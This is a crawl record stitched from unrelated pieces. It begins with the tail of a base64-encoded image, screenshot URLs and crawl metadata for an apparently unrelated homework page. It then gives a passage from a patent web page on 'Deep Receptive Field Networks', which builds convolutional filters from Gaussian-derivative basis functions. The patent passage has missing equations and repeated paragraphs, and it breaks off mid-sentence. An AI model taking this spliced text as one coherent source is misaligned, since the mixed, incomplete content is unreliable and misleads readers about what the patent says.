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", null, "https://s3-us-west-2.amazonaws.com/c3po-media-dev/files/b256cb21-6d4e-11e9-a188-ef5cbab29e48/Screen Shot 2014-06-21 at 4_original.png", null, "https://s3-us-west-2.amazonaws.com/c3po-media-dev/files/54334180-6d4f-11e9-a188-ef5cbab29e48/Screen Shot 2014-06-21 at 4_original.png", null, "https://s3-us-west-2.amazonaws.com/c3po-media-dev/files/83254260-284e-11ec-940a-619232e34915/Screen Shot 2021-10-07 at 3_original.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8944296,"math_prob":0.98979664,"size":701,"snap":"2021-43-2021-49","text_gpt3_token_len":163,"char_repetition_ratio":0.19655667,"word_repetition_ratio":0.061068702,"special_character_ratio":0.2425107,"punctuation_ratio":0.07586207,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9879386,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,null,null,null,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-04T13:31:05Z\",\"WARC-Record-ID\":\"<urn:uuid:de30828f-2c4f-4bdb-847e-bdba4ac595cc>\",\"Content-Length\":\"39584\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6791da51-239a-4d46-90c4-ffd2295964d0>\",\"WARC-Concurrent-To\":\"<urn:uuid:3117a943-676f-4cb5-8c60-d4e0101b1958>\",\"WARC-IP-Address\":\"172.67.70.60\",\"WARC-Target-URI\":\"https://homework.cpm.org/category/CCI_CT/textbook/pc/chapter/10/lesson/10.1.2/problem/10-25\",\"WARC-Payload-Digest\":\"sha1:JVOWD6VUG5ROFLJI6UCNLF5YPVOVEF5A\",\"WARC-Block-Digest\":\"sha1:UXBVR3NCJETEUNSUXDYIF5MKISO2HI7J\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964362992.98_warc_CC-MAIN-20211204124328-20211204154328-00386.warc.gz\"}"}
https://vanessenpatent.nl/project/deepreceptivefields/
[ "Select Page\n\n## Deep Receptive Field Networks", null, "Field of the invention\n\nThe invention relates to a method for recognition of information in digital image data, a device for recognition of categorical information from digital image data, and a computer program product which, when running on a data processor, provides categorising a digital image.\n\nBackground of the invention\n\nThe amount of digital image data grows exponentially in time. The available amount of digital image data, available on the internet, for instance, is huge. Various methods are proposed for searching in this digital image data.\n\nCurrently, a computational approach that is used to category recognition applies convolutional neural networks.\n\nIn a learning phase, these networks have large numbers of parameters to learn. This is their strength, as they can solve extremely complicated problems. At the same time, the large number of parameters is a limiting factor in terms of the time needed and of the amount of data needed to train them (A. Krizhevsky, I. Sutskever, and G. E. Hinton. Imagenet classification with deep convolutional neural networks. NIPS, 2012; A. Coates and A. Y. Ng. Selecting receptive fields in deep networks. NIPS, 2011). For the computation time, the GoogLenet architecture (C. Szegedy, W. Liu, Y. Jia, P. Sermanet, S. Reed, D. Anguelov, D. Erhan, V. Vanhoucke, and A. Rabinovich. Going deeper with convolutions. arXiv:1409.4842, 2014) trains up to 21 days on a million images in a thousand classes on top notch GPU’s to achieve a 4% top-5-error.\n\nFor many practical small data problems, pre-training on a large general dataset is an alternative, or otherwise unsupervised pre-training on subsets of the data.\n\nIn the literature, an elegant approach to reduce model complexity has been proposed by J. Bruna and S. Mallat. Invariant scattering convolution networks. IEEE T-PAMI, 35(8):1872–1885, 2013. By the convolutional scattering network cascading Wavelet transform convolutions with nonlinearity and pooling operators. On various subsets of the MNIST benchmark, they show that this approach results in an effective tool for small dataset classification. The approach computes a translation-invariant image representation, stable to deformations, while avoiding information loss by recovering wavelet coefficients in successive layers yielding state-of-the-art results on handwritten digit and texture classification, as these datasets exhibit the described invariants. However, the approach is also limited in that one has to keep almost all possible cascade paths (equivalent to all possible filter combinations) according to the model to achieve general invariance. Only if the invariance group, which solves the problem at hand is known a priori, one can hard code the invariance network to reduce the feature dimensionality. This is effective when the problem and its invariances are known precisely, but for many image processing applications this is rarely the case. And, the reference does allow for infinite group invariances.\n\nOther attempts to tackle the complicated and extensive training in convolutional neural networks rely heavily on regularization and data augmentation for example by dropout. The Maxout networks (Ian J Goodfellow, David Warde-Farley, Mehdi Mirza, Aaron Courville, and Yoshua Bengio. Maxout networks. arXiv preprint arXiv:1302.4389, 2013) leverage dropout by introducing a new activation function. The approach improved state of the art results on different common vision benchmarks. Another perspective on reducing sample complexity has been made by Robert Gens and Pedro M Domingos, Deep symmetry networks, In Advances in neural information processing systems, pages 2537–2545, 2014, by introducing deep symmetry networks. These networks apply non-fixed pooling over arbitrary symmetry groups and have been shown to greatly reduce sample complexity compared to convolutional neural networks on NORB and rotated MNIST digits when aggregated over the affine group. Also focussing on modelling invariants is the convolutional kernel network approach introduced by J. Mairal, P. Koniusz, Z. Harchaoui, and C. Schmid. Convolutional kernel networks. NIPS, 2014, which learns parameters of stacked kernels. It achieves impressive classification results with less parameters to learn than a convolutional neural networks.\n\nJ. Bruna and S. Mallat. Invariant scattering convolution networks. IEEE T-PAMI, 35(8):1872–1885, 2013, according to the abstract: A wavelet scattering network computes a translation invariant image representation, which is stable to deformations and preserves high frequency information for classification. It cascades wavelet transform convolutions with non-linear modulus and averaging operators. The first network layer outputs SIFT-type descriptors whereas the next layers provide complementary invariant information which improves classification. The mathematical analysis of wavelet scattering networks explain important properties of deep convolution networks for classification. A scattering representation of stationary processes incorporates higher order moments and can thus discriminate textures having same Fourier power spectrum. State of the art classification results are obtained for handwritten digits and texture discrimination, with a Gaussian kernel SVM and a generative PCA classifier. This requires a complete set of filters, and/or knowledge of the data set in order to select the relevant filters. Furthermore, rotation, scaling and other need to be taken into account.\n\nHONGLAK LEE ET AL: “Convolutional deep belief networks for scalable unsupervised learning of hierarchical representations”, PROCEEDINGS OF THE 26TH ANNUAL INTERNATIONAL CONFERENCE ON MACHINE LEARNING, ICML ’09, pp. 1-8, according to its abstract discloses that there has been much interest in unsupervised learning of hierarchical generative models such as deep belief networks. Scaling such models to full-sized, high-dimensional images remains a difficult problem. To address this problem, we present the convolutional deep belief network, a hierarchical generative model which scales to realistic image sizes. This model is translation-invariant and supports efficient bottom-up and top-down probabilistic inference. Key to our approach is probabilistic max-pooling, a novel technique which shrinks the representations of higher layers in a probabilistically sound way. Our experiments show that the algorithm learns useful high-level visual features, such as object parts, from unlabeled images of objects and natural scenes. We demonstrate excellent performance on several visual recognition tasks and show that our model can perform hierarchical (bottom-up and top-down) inference over full-sized images.\n\nJOAN BRUNA ET AL: ‘Classification with Invariant Scattering Representations”, ARXIV.ORG, CORNELL UNIVERSITY LIBRARY, 201\n\nOLIN LIBRARY CORNELL UNIVERSITY ITHACA, NY according to its abstract discloses that scattering transform defines a signal representation which is invariant to translations and Lipschitz continuous relatively to deformations. It is implemented with a non-linear convolution network that iterates over wavelet and modulus operators. Lipschitz continuity locally linearizes deformations. Complex classes of signals and textures can be modeled with low-dimensional affine spaces, computed with a PCA in the scattering domain. Classification is performed with a penalized model selection. State of the art results are obtained for handwritten digit recognition over small training sets, and for texture classification.\n\nMARC ‘AURELIO RANZATO ET AL: “Unsupervised Learning of Invariant Feature Hierarchies with Applications to Object Recognition”, CVPR ’07. IEEE CONFERENCE ON COMPUTER VISION AND PATTERN RECOGNITION; 18-23 JUNE 2007; MINNEAPOLIS, MN , USA, IEEE, PISCATAWAY, NJ, USA, pp 1-8, according to its abstract discloses to present an unsupervised method for learning a hierarchy of sparse feature detectors that are invariant to small shifts and distortions. The resulting feature extractor consists of multiple convolution filters, followed by a feature-pooling layer that computes the max of each filter output within adjacent windows, and a point-wise sigmoid non-linearity. A second level of larger and more invariant features is obtained by training the same algorithm on patches of features from the first level. Training a supervised classifier on these features yields 0.64% error on MNIST, and 54% average recognition rate on Caltech 101 with 30 training samples per category. While the resulting architecture is similar to convolutional networks, the layer-wise unsupervised training procedure alleviates the over-parameterization problems that plague purely supervised learning procedures, and yields good performance with very few labeled training samples.\n\nSummary of the invention\n\nThe invention seeks to reduce computation, and/or the possibility to use reduced data sets.\n\nThe invention pertains to a method for recognition of information in digital image data, said method comprising a learning phase on a data set of example digital images having known information, and characteristics of categories are computed automatically from each example digital image and compared to its known category, said method comprises training a convolutional neural network comprising network parameters using said data set, in which via deep learning each layer of said convolutional neural network is represented by a linear decomposition of all filters as learned in each layer into basis functions.\n\nThe invention further pertains to a computer program product for classification of data having local coherence, in particular spatial coherence, for instance data selected from images, time series, and speech data, said computer program product comprising a deep receptive field network, comprising a filter kernel comprising a linear combination of basis functions.\n\nThe invention further pertains to a computer program product for classification of data having local coherence, in particular spatial coherence, for instance data selected from images, time series, and speech data, said computer program product comprising a deep convolutional neural network comprising receptive field functions, wherein said receptive field functions comprise a linear combination of functional complete basis functions.\n\nIn an embodiment of the computer program product said neural network comprise weights that are learnt using a sample dataset, in particular said weights are learned for a whole patch at once.\n\nIn an embodiment of the computer program product said neural network comprises a or said kernel that is a linear combination of basis functions:\n\nwherein in particular ϕi is a complete set of basis functions, with the parameters of the convolutional layers are the parameters of the parameters α.\n\nUsing this method and device, a reduction of computation is possible: The new architecture enables us to reduce the number of convolutions by an order of magnitude while not loosing signal expressiveness in the model. Reduction of computation leads to the requirement of less (battery) power to achieve the same recognition accuracy.\n\nFurthermore, the method and device are usable on small datasets while being as good as others on big data set: The new network converges in substantially less epochs, improving on the standard benchmarks for small data training sets. In addition the method is better compared to convolutional scattering for small and big sample sizes on MNIST.\n\nThe computer program product can be implemented into a method or a device for classification and/or for regression analysis. The data is in particular multi dimensional\n\nIn the current application, it is aim to devise an algorithm combining the best of both worlds: a basis different from the wavelet-basis to achieve a low-data learning capacity, while still achieving the full learning capacity of the convolutional neural net approach without the need to specify the invariance classes a priori.\n\nThe many attempts to reduce model complexity, to reduce sample complexity, to regularize models more effectively, or to reduce training time of the convolutional neural networks approach, may all be implemented independently in the current method as well. In the experiments, the focus is on the simplest comparison, that is of the standard convolutional neural networks with the standard receptive field net without these enhancements on neither side.\n\nIn the art, if a dataset has other sources of variability due to the action of other finite Lie groups such as rotations, then this variability can be eliminated with an invariant scattering computed by cascading wavelet transforms defined on these groups. However, signal classes may also include complex sources of variability that cannot be approximated by the action of a finite group, as in CalTech101 or Pascal databases. This variability must be taken into account by unsupervised optimizations of the representations from the training data. Deep convolution networks which learn filters from the data, like in the current invention, have the flexibility to adapt to such variability.\n\nThe invention relates to neural networks that apply convolution to data of data sets. A set of images are an example of such data sets. Images usually have data that has a spatial coherence. The neural network applies convolution using a set of filters. In the art, this set needs to be complete, or information regarding the data is needed in order to select the right filter set to start with. Here, a set of basis function is used with which the filters are defined. It was found that the filters can be described using the set of basis functions. Furthermore or alternatively, when the fitting accuracy needs to be higher, for fitting higher order information, the basic functions can be set more accurate. In combination or alternatively, the basis functions can be expanded to more of the relatively standard basis functions. This without using knowledge of the data set.\n\nIn an embodiment, the network parameters of the convolutional layers are parameters expressing the weights of each member in a set of basis functions selected from a Taylor expansion and a Hermite expansion, for providing approximators for a local image structure by adapting said network parameters during training. In an embodiment, wavelets can also constitute a basis for the receptive field network. To that end, all basis can be rewritten into each other, so it takes some steps from Taylor to Hermite basis. If a infinite number of elements of the Hermite expansion are kept, it can be rewritten as wavelets.\n\nIn an embodiment, the method further comprises preprograming the basis functions in the network as Gaussian-shaped filters to decompose the filters.\n\nIn an embodiment, the method comprises using a receptive field network (RFnet) including a convolution kernel F(x; y) of the form F(x; y) = Gs(x; y)f(x; y), where Gs is a Gaussian function that serves as an aperture defining the local neighbourhood.\n\nIn an embodiment, a set of monomial basis functions: are used for the learning function values, or functionally simpler functions that turn up in a Taylor series expansion of the function f.\n\nIn an embodiment, the to be learned parameters αm as follows: where the derivatives f at that position with index indicating their order are measured by the Gaussian linear filter of the same derivative order.\n\nThe invention further relates to a method for recognition of categorical information from digital image data, said method comprising providing a trained neural network, trained using the method above.\n\nThe invention further relates to a device for recognition of categorical information from digital image data, comprising a computer system comprising a computer program product with, when running on said computer system, applies a trained neural network derived according to the method described above.\n\nThe invention further relates to a computer program product which, when running on a data processor, performs the method described above.\n\nThe invention further relates to a  method for recognition of information in digital image data, said method comprising deriving a convolutional neural network architecture based on receptive field filter family as a basis to approximate arbitrary functions representing images by at least one selected from Taylor series expansion and Hermite functional expansion.\n\nRecognition of categories in digital images\n\nIn the recognition of categorical information as machine-learned from digital image data, convolutional neural networks are an important modern tool. “Recognition of categorical information” in this sentence means to say that a label (for example “cow”, “refrigerator”, “birthday party”, or any other category attached to a digital picture; the category may refer to an object in the digital image or it may refer to a condition in the scene). Thus, in fact, data that comprises locally coherent data can be binned. Often, such bins are discrete, like the label or category example above. It is also possible to categorise the data in multidimensional bins. Examples are for instance “small-medium-large” to an object. In fact, the network can even categorize on the basis of information that is continuous, for instance a continuous variable like size. In such a categorisation, regression analysis is possible. In this respect, data that comprises locally coherency relates to data that can be multi-dimensional. This data in at least one dimension has data points that are coherent in an area around at least one of its data points. Examples of such data are images, video (which has position coherence and time coherence), speech data, time series. Data points hold some information on their neighbouring data points.\n\nPurpose\n\nThis is the purpose of recognition: to automatically label a yet-unseen image from features and characteristics computed from the digital image alone.\n\nLearning and application phases\n\nThe process of recognition of categorical information consists of two steps: a learning phase and an application phase. In the processing of the learning phase, unique characteristics of categories are derived automatically from the features computed from each example digital image and compared to its known category (i.e. a stack of digital pictures each labelled “cow”, a stack of digital pictures each labelled  “refrigerator”, etc. for all categories involved). These characteristics derived from features are transferred to the application phase. In the processing of the application phase, the same features are computed from an unknown image. By computation on the features again, it is established whether these features include the unique characteristics of a category A. If so, the unknown image is automatically labelled with this category A.\n\nIntroduction to the new approach\n\nConvolutional neural network learning can be seen as a series of transformations of representations of the original data. Images, as well as signals in general, are special in that they demonstrate spatial coherence, being the correlation of the value of a pixel with the values in the pixel’s neighbourhood almost everywhere. (Only at the side of steep edges it remains undecided whether a pixel belongs to one side or to the other. The steepness of camera-recorded edges is limited by the bandwidth, as a consequence of which the steepest edges will not occur in practice.) When looking at the intermediate layers of convolutional neural networks, the learned image filters are spatially coherent themselves, not only for the first layers [Mallat] but also for all but the last, fully-connected layers, although there is nothing in the network itself which forces the filters into spatial coherence. See figure 1, for an illustration of intermediate layers.\n\nApproach\n\nDifferent from standard convolutional neural nets we pre-program the layers of the network with Gaussian-shaped filters to decompose the image as a linear decomposition onto a local (Taylor- or Hermite-) functional expansion.\n\nThe invention frther relates to a method for recognition of information in digital image data, said method comprising a learning phase on a data set of example digital images having known information, and characteristics of categories are computed automatically from each example digital image and compared to its known category, said method comprises training a convolutional neural network comprising network parameters using said data set, in which via deep learning each layer of said convolutional neural network is represented by a linear decomposition of all filters as learned in each layer into basis functions.\n\nThe person skilled in the art will understand the term “substantially” in this application, such as in “substantially encloses” or in “substantially extends up to”. The term “substantially” may also include embodiments with “entirely”, “completely”, “all”, etc. Hence, in embodiments the adjective substantially may also be removed. Where applicable, the term “substantially” may also relate to 90% or higher, such as 95% or higher, especially 99% or higher, even more especially 99.5% or higher, including 100%. The term “comprise” includes also embodiments wherein the term “comprises” means “consists of”.\n\nFurthermore, the terms first, second, third and the like if used in the description and in the claims, are used for distinguishing between similar elements and not necessarily for describing a sequential or chronological order. It is to be understood that the terms so used are interchangeable under appropriate circumstances and that the embodiments of the invention described herein are capable of operation in other sequences than described or illustrated herein.\n\nThe probe herein are amongst others described during operation. As will be clear to the person skilled in the art, the invention is not limited to methods of operation or devices in operation.\n\nIt should be noted that the above-mentioned embodiments illustrate rather than limit the invention, and that those skilled in the art will be able to design many alternative embodiments without departing from the scope of the appended claims. In the claims, any reference signs placed between parentheses shall not be construed as limiting the claim. Use of the verb “to comprise” and its conjugations does not exclude the presence of elements or steps other than those stated in a claim. The article “a” or “an” preceding an element does not exclude the presence of a plurality of such elements. The invention may be implemented by means of hardware comprising several distinct elements, and by means of a suitably programmed computer. In the device or apparatus claims enumerating several means, several of these means may be embodied by one and the same item of hardware. The mere fact that certain measures are recited in mutually different dependent claims does not indicate that a combination of these measures cannot be used to advantage.\n\nThe invention further applies to a probe or parts thereof comprising one or more of the characterising features described in the description and/or shown in the attached drawings. The invention further pertains to a method or process comprising one or more of the characterising features described in the description and/or shown in the attached drawings.\n\nThe various aspects discussed in this patent can be combined in order to provide additional advantages. Furthermore, some of the features can form the basis for one or more divisional applications.\n\nBrief description of the drawings\n\nEmbodiments of the invention will now be described, by way of example only, with reference to the accompanying schematic drawings in which corresponding reference symbols indicate corresponding parts, showing an embodiment of a construction element, and showing in:\n\nFigures open in an new tab\n\nFigure 1 State of the art convnet trained on random subsets of CIFAR-10;\n\nFigure 2 filters randomly sampled from all layers of the GoogLenet model, from left to right layer number increases;\n\nFigure 3 a representation of the method and device;\n\nFigure 4a, 4b both architectures trained on 300 randomly selected samples of MNIST and 300 randomly selected samples of CIFAR-10 on the bottom and trained on the full training sets on the top\n\nFigure 5: Computation time vs the size of the convolution filter. Note that RFNets depend mostly on the order of the function basis, and\n\nFigure 6 RFNet filters before (left) and after training (right) for 2 epochs on MNIST.\n\nThe drawings are not necessarily on scale.\n\nDescription of preferred embodiments\n\nConvolutional neural networks have large numbers of parameters to learn. This is their strength as they can solve extremely complicated problems. At the same time, the large number of parameters is a limiting factor in terms of the time needed and of the amount of data needed to train them (Krizhevsky et al., 2012; Coates et al., 2011). For the computation time, the GoogLenet architecture trains up to 21 days on a million images in a thousand classes on top notch GPU’s to achieve a top-5-error. For limited data availability the small experiment in Figure 1 quantifies the loss in performance relative to an abundance of data. For many practical small data problems, pretraining on a large general dataset is an alternative, or otherwise unsupervised pretraining on subsets of the data, but naturally training will be better when data are of the same origin and the same difficulty are being used. Therefore, the reduction of the effective number of free parameters is of considerable importance for the computation time and classification accuracy of low-data problems\n\nThe recent review in Nature describes deep learning as a series of transformations of representations of the original data. We aim to use this definition in its most direct form for images. Images, as signals in general, are special in that they demonstrate spatial coherence, being the correlation of the value of a pixel with the values in the pixels neighbourhood almost everywhere. (Only at the side of steep edges it remains undecided whether a pixel belongs to one side or to the other. The steepness of camera-recorded edges is limited by the bandwidth, as a consequence of which the steepest edges will not occur in practice.) When looking at the intermediate layers of convnets, the learned image filters are spatially coherent themselves, not only for the first layers but also for all but the last, fully-connected layer, although there is nothing in the network itself which forces the filters into spatial coherence. See figure 2, for an illustration from the intermediate layers 1 to 5.\n\nIn figure 2, Filters are randomly sampled from all layers of the GoogLenet model (see Szegedy, W. Liu, Y. Jia, P. Sermanet, S. Reed, D. Anguelov, D. Erhan, V. Vanhoucke, and A. Rabinovich. Going deeper with convolutions. arXiv:1409.4842, 2014), from left to right layer depth increases. Without being forced to do so, the model exhibits spatial coherence (seen as smooth functions almost everywhere) after being trained on ImageNet. This behaviour reflects the spatial coherence in natural images. It supports the assumption that higher layer feature maps can be seen as sufficiently smooth representations themselves.\n\nIn higher layers, the size of the coherent patches may be smaller indeed, the layer still shows coherence. We take this observation and deep learn the representation at each layer by a linear decomposition onto basis functions as they are known to be a compact approximation to locally smooth functions. This local (Taylor- or Hermite-) functional expansion is the basis of our approach.\n\nIn the literature, an elegant approach to reduce model complexity has been proposed by Bruna et al. by the convolutional scattering network cascading Wavelet transform convolutions with nonlinearity and pooling operators. On various subsets of MNIST, they show that this approach results in an effective tool for small dataset classification. The approach computes a translation invariant image representation, stable to deformations, while avoiding information loss by recovering wavelet coefficients in successive layers yielding state-of-the-art results on handwritten digit and texture classification, as these datasets exhibit the described invariants.\n\nHowever, the approach is also limited in that one has to keep almost all possible cascade paths (equivalent to all possible filter combinations) according to the model to achieve general invariance. Only if the invariance group, which solves the problem at hand is known a priori, one can hard code the invariance network to reduce the feature dimensionality. This is effective when the problem and its invariances are known precisely, but for many image processing applications this is rarely the case. And, the reference does allow for infinite group invariances. In this work, we aim to devise an algorithm combining the best of both worlds: to be inspired by the use of a wavelet-basis to achieve low-data learning capacity of the scattering convolutional network, while still achieving the full learning capacity of the Convolutional Neural Network (CNN)-approach without the need to specify the invariance classes a priori.\n\nOther attempts to tackle the complicated and extensive training in convnets, rely heavily on regularization and data augmentation for example by dropout. The maxout networks (Goodfellow, 2013) leverage dropout by introducing a new activation function. The approach improved state of the art results on different common vision benchmarks. Another perspective on reducing sample complexity has been made by Gens and Domingos (2014) by introducing deep symmetry networks. These networks apply non-fixed pooling over arbitrary symmetry groups and have been shown to greatly reduce sample complexity compared to convnets on NORB and and rotated MNIST digits when aggregated over the affine group. Also focussing on modelling invariants is the convolutional kernel network approach introduced by Meiral et al. (2014) which learns parameters of stacked kernels. It achieves impressive classification results with less parameters to learn than a convnet. The many attempts to reduce model complexity, to reduce sample complexity, to regularize models more effectively, or to reduce training time of the convnet approach, may all be implemented independently in our method as well. In the experiments we focus on the simplest comparison, that is of the standard convnet with our standard receptive field net without these enhancements on neither side.\n\nConvnets take an 